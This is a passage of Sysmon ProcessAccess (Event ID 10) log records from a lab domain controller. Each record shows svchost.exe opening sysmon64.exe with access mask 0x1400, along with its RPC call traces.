C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5777,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5778,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5779,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 